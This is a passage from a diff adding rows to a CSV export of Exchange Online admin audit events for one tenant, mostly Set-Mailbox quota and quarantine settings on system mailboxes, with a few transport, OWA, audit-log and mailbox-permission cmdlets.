+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T21:43:52Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T21:43:45Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T21:43:39Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Microsoft Exchange""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""10 GB (10,737,418,240 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""9 GB (9,663,676,416 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""10 GB (10,737,418,240 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T21:43:30Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}""
+  },
+  {
+    ""Name"": ""UMDataStorage"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  }
+]"
+2020-04-23T21:44:42Z,,,Set-TransportConfig,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com""
+  },
+  {
+    ""Name"": ""HygieneSuite"",
+    ""Value"": ""Premium""
+  }
+]"
+2020-04-23T21:44:25Z,,,Set-OwaMailboxPolicy,"[
+  {
+    ""Name"": ""InstantMessagingType"",
+    ""Value"": ""Ocs""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\OwaMailboxPolicy-Default""
+  }
+]"
+2020-04-23T21:44:11Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T21:44:05Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T21:44:04Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T21:43:57Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T21:43:50Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T21:43:44Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T21:43:36Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""OMEncryptionStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T21:43:19Z,,,Install-ResourceConfig,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""Organization"",
+    ""Value"": ""seccxpninja.onmicrosoft.com""
+  }
+]"
+2020-04-23T21:44:45Z,,,Set-AdminAuditLogConfig,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""IgnoreDehydratedFlag"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com""
+  },
+  {
+    ""Name"": ""AdminAuditLogEnabled"",
+    ""Value"": ""True""
+  }
+]"
+2020-04-23T21:44:40Z,,,Add-MailboxPermission,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}""
+  },
+  {
+    ""Name"": ""User"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/Discovery Management""
+  },
+  {
+    ""Name"": ""AccessRights"",
+    ""Value"": ""FullAccess""
+  }
+]"
+2020-04-23T21:44:17Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""TenantAllowBlockLists"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T21:44:10Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T21:44:05Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T21:43:58Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T21:43:58Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T21:43:51Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
